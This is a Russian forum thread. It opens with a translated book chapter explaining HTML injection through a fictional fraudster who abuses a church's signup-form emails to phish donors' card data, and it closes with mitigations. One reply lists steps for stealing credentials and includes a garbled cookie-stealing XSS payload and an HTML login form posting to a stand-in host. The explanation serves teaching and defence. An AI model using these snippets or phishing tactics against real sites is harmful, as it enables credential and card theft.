Статья Современные web-уязвимости (1.Html Injection)

Публикую перевод ресерчей по книге 2021 года от Brandon Wieser , потому что сам ничего подобного сотворить пока не могу :*(
  1. Html Injection
  2. Host Header Injection
  3. Username Enumeration – SSN
  4. Same Origin Policy и Exploiting CORS Misconfigurations
  5. Origin Reflection Attacks
  6. CSRF
  7. CSRF Bypass – Clickjacking Drag and Drop
  8. Redirection Bugs
  9. XSS – Cross-Site Scripting
  10. Identifying XSS Vulnerabilities
  11. JSONP
  12. Language-Specific XSS
  13. SOME Attacks
  14. CSV Injection
  15. HTTP Desync
  16. Web Cache Poisoning
Статьи рассчитаны на средний уровень знаний, однако первая глава простая, затем сложность будет увеличиваться.

Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственности за любой возможный вред, причиненный с использованием сведений из этой статьи.

HTML-INJECTION

Мы начинаем свой путь с уязвимости, которой пентестеры или сканеры обычно присваивают низкий рейтинг в отчете о тестировании на проникновение веб-приложения. Однако, реальные злоумышленники и участники баг баунти (бб) любят такие уязвимости, потому что они обычно позволяют быстро заработать. Они распространены, потому что существует разрыв в мышлении ИБ профессионалов и злоумышленников из реального мира. Реальные злоумышленники знают насколько эффективен фишинг, вишинг и социальная инженерия в связке с недостатком в безопасности приложения (например, open-redirect, HTML-injection и т. д.).

Модели угроз, специалисты по комплаенсу, разработчики и некоторые специалисты по информационной безопасности не всегда учитывают мотивацию современных злоумышленников. Сегодня многие злодеи (и не только) хотят извлечь побольше деньжат с наименьшими усилиями, используя схемы и векторы атаки, которые будут приносить деньги как можно дольше.

С точки зрения злоумышленника, зачем тратить недели на поиск ошибки в выполнении кода на веб-сервере компании, который, вероятно, размещен в демилитаризованной зоне или облаке, на котором ежегодно проводятся тесты на проникновение и ведутся журналы, анализируемые множеством продуктов безопасности синей команды?

Кроме того, вполне вероятно, что любые полезные данные, например номера кредитных карт, зашифрованы. Иногда более практично организовать массовую атаку на конечных пользователей, использующих приложение напрямую. Эти атаки могут быть неоднократно проведены в течение года и вряд ли поднимут тревогу. Кроме того, многие уязвимости не требуют наличия у злоумышленника продвинутых навыков или набора инструментов, чтобы их проэксплуатировать.

Злодей

Чтобы продемонстрировать эти концепции, мы выступим в роли вымышленного злоумышленника. Атакующий, Юрий, живет в развивающейся стране, где средняя семья живет на 200 долларов в месяц. В крупных городах его страны есть трущобы без доступа к чистой воде и электричеству. Часто члены семьи работают за границей и отправляет деньги домой. В его случае у него есть двоюродные братья и сестры, которые живут как рабочие-мигранты в Торонто, Канада.

Юрий работает веб-разработчиком, зарабатывая 400 долларов в месяц. Он пополняет свой ежемесячный доход, используя фишинговые схемы и другое мошенничество с электронной почтой в свободное время будучи членом кибершайки. Он также активен на нескольких форумах по кардингу.
Вдруг он и его коллеги были уволены из-за COVID-19. Поскольку работы нет, он решает полностью посвятить себя киберпреступности. Его цели просты: использовать свои навыки, чтобы заработать как можно больше денег в кратчайшие сроки.

Он много слышал от своих кузенов о щедрости среднего канадца, особенно пенсионного и предпенсионного возраста. В самом деле, его двоюродный брат только что говорил, как люди жертвуют деньги в Интернете на их церкви. Он решает выполнить поиск католических церквей в Google в Торонто и нажимает на первую ссылку, которая появляется на странице результатов Google.

Screenshot_20210417-055003_EBookDroid.jpg


Сразу же, кнопка «Donate now», ссылки на социальные сети (Facebook, YouTube и Twitter) и кнопки COVID-19 привлекают его внимание.

Он делает мысленную заметку, что церковь участвует в нескольких формах волонтерства. Ему интересно, сколько людей знают об этой церкви. Нажав на ссылку Facebook, он видит, что более 13 000 человек понравилась страница. Вероятно, несколько тысяч человек являются постоянными участниками этой церкви.

Злоумышленник испытывает соблазн использовать полученную информацию для запуска атаки. Он мог просто зарегистрировать доменное имя, подобное церковному домену, создать страницу Facebook с аналогичным именем или создать копию веб-сайта, который будет размещен на его веб-сервере. Этот похожий сайт будет регистрировать введенную информацию о кредитной карте, чтобы злоумышленник мог списать карту через подставной бизнес, купить биткойны или просто продать кредитную карту в даркнете.

После настройки злоумышленник может начать отправлять сообщения через Facebook людям, которым понравились страницы церкви в Facebook, и перенаправлять их на свои фальшивые сайты. Если он хочет потратить больше денег, он может даже купить Facebook рекламу с таргетингом только на людей, которым понравилась церковь, или на всех по почтовому индексу или местоположению.

Он знает, что этот метод, хотя и эффективен для получения денег в краткосрочной перспективе, все же является более активным и трудоемким подходом. В конце концов, и скорее всего, очень быстро его домен будет заблокирован как вредоносный, а его электронные письма будут помещены в папку для спама, особенно если он попытается воспользоваться COVID-19 как приманкой для электронной почты. Кроме того, его страница в Facebook будет в конечном итоге объявлена мошеннической и будет закрыта. Схема быстро превратиться в игру в кошки-мышки и станет настоящей работой.

Для многих людей в его стране это более чем достаточно. Но не в его случае. Вместо этого он продолжает изучать веб-сайт. При нажатии на «Contact us» есть форма регистрации, которая позволяет конечному пользователю подписаться на список рассылки. По его телу пробегает покалывание от возбуждения. Он знает регистрационные формы, которые запрашивают имя, могут быть отличным местом для поиска HTML
инъекции.

Он с нетерпением отправляет тестовые данные в поле имени и фамилии, как показано ниже:

Screenshot_20210417-060634_EBookDroid.jpg


После нажатия на "SUBSCRIBE" он проверяет входящие на своей эл.почте с надеждой на успех:

Screenshot_20210417-060742_EBookDroid.jpg


Успех! Поля имени и фамилии в контактной форме уязвимы для HTML-инъекции. Как показано на рисунке выше, приложение отправляет персонализированное электронное письмо для конечного пользователя с указанием имени и фамилии после слова «Dear». Если эти поля содержат HTML-теги, то почтовый клиент жертвы с радостью их отобразит.

Юрий начинает создавать фишинговую нагрузку, которую он может использовать, чтобы обманывать людей и получать их пожертвования. Он решает найти стоковую фотографию обедневшей семьи и прилепляет просьбу о пожертвовании.

Он размещает это изображение на веб-сервере. Когда пользователь нажимает на изображение, жертва попадает на страницу фальшивого пожертвования, где записывается платеж жертвы.

Эта информация может быть продана в даркнете, использоваться, чтобы обойти анти-банковские меры мошенничества, или может быть отправлена его кузенам в Торонто, чтобы клонировать кредитные карты и совершать покупки или снимать наличные в банкоматах на месте.

Пейлоад и изображение к нему:

Screenshot_20210417-062136_EBookDroid.jpg

Screenshot_20210417-062213_EBookDroid.jpg


Удовлетворенный результатом, его следующий шаг - составить список адресов электронной почты жертв для атаки. Он решает приобрести список адресов электронной почты для рассылки спама. Список рассылки в Торонто можно купить всего за 30 долларов, например, с .
Поскольку форма не имеет средств защиты от автоматизации, злоумышленник может злоупотреблять функционалом так, как ему хочется. Хотя это обычный способ использовать регистрационные формы, красные команды и более продвинутые киберпреступные группы могут использовать те же функции для направленного фишинга (spearfishing) и распространения C2 вредоносносов. Этот метод обходит большинство инструментов обнаружения синей команды, включая ведение журнала, репутацию домена и другие меры.

Например, электронное письмо может быть отправлено сотруднику организации с текстом, что возникла проблема со взносами потерпевшего по страховке или что пароль нужно изменить. В электронном письме будет ссылка на сброс пароля или аутентификацию своей учетной записи, которая будет перенаправлять их на фишинговую страницу, размещенную злоумышленником, и будет записывать их реквизиты для входа.

Еще более опасный вариант. В электронном письме жертве предлагается загрузить и выполнить файл .docx или .xlsx, содержащий вредоносный макрос, или загрузить обновление программного обеспечения, которое на самом деле является вредоносным исполняемым файлом. Атакующий ограничен только его воображением, когда дело доходит до эксплуатации столь широко распространенных и зачастую упускаемых из вида вектора угрозы.

Жертве не легко оценить безопасность электронных писем. Они исходят из домена организации, используют их электронную почту,
и адресованы непосредственно жертве. Хуже того, злоумышленник может легко автоматизировать атаку для охвата большего количества пользователей.

Вывод

Часто найденные уязвимости, отмеченные как низкие могут использоваться злоумышленниками в серьезных угрозах. Настоящие злоумышленники предпочитают находить векторы атак, такие как HTML-инъекция, потому что они не исправляются в течение длительного времени и часто обходится мониторингом и другими мерами безопасности.

Чтобы предотвратить HTML-инъекции, не отражайте данные указываемые пользователем в сообщениях электронной почты. Это позволяет конечному пользователю управлять электронной почтой адресата. Если это невозможно, тогда шифруйте пользовательские HTML данные. Внедрите средства защиты от автоматизации, такие как Google капча. Злоумышленники могут обойти защиту от капчи с помощью таких сервисов, как , однако, по крайней мере это увеличит стоимость эксплуатация.
 
Последнее редактирование:

ripmandin

Red Team
13.03.2020
38
147
BIT
9
Напишите как вам формат и актуальность этой статьи, а также какую уязвимость разобрать в следующей статье.
 
  • Нравится
Реакции: vandam 228 и Dudos

wooolff

Green Team
19.02.2017
233
36
BIT
0
Молодец, продолжай. Когда излагаешь материал, как минимум у себя в голове наводится порядок
 
  • Нравится
Реакции: ripmandin

rainS

Green Team
22.06.2020
26
22
BIT
0
Даже не верится что на таком можно заработать. А статья хорошая, хоть и старая инфа)
From Html Inj to Steal login & pass, can leads to XSS

1) Найти сайт уязвимый к html inj.
2) Внедрить код.
3) Дождаться пока жертва введет свой логин и пароль.
4) Зайти под кредами юзера.
5) Докрутить до stored XSS и украcть cookie:
JavaScript:
<img src=x onerror=this.src='+document.cookie>

HTML:
<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8">
  <title>Форма</title>
 </head>
 <body>
  <form id="auth" action="https://yourdomain.com" method="post"></form>
  <p>...</p>
  <p><input name="login" form="auth">
  <input type="password" name="pass" form="auth"></p>
  <p><input type="submit" form="auth"></p>
 </body>
</html>
 
  • Нравится
Реакции: Koloboking и Dervish

cypma5

Green Team
01.09.2021
3
5
BIT
0
Статьи супер.
Даже не верится что на таком можно заработать. А статья хорошая, хоть и старая инфа)
Проблема современного ИБ, на всех конференциях обсуждаются Threat Intelligence, SOC, контейнеры, HoneyPot и прочие новомодные фишки.
Но при этом в большинстве предприятий слабая парольная политика : стандартные смена пароля раз в 3-6 месяцев, рекомендация паролей со спецсимволами , когда пароль обычного пользователя превращается в счетчик. сегодня qwerty2020, через 3 месяца qwerty2021, дальше 2022qwerty. Хранится на бумажке под клавиатурой, и т.д.
 
  • Нравится
Реакции: TrUffAlDiNo и BlackHundred
30.10.2021
1
0
BIT
0
А каким образом внедрение своего html во время регистрации позволило ему сделать рассылку с картинкой от имени церкви?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!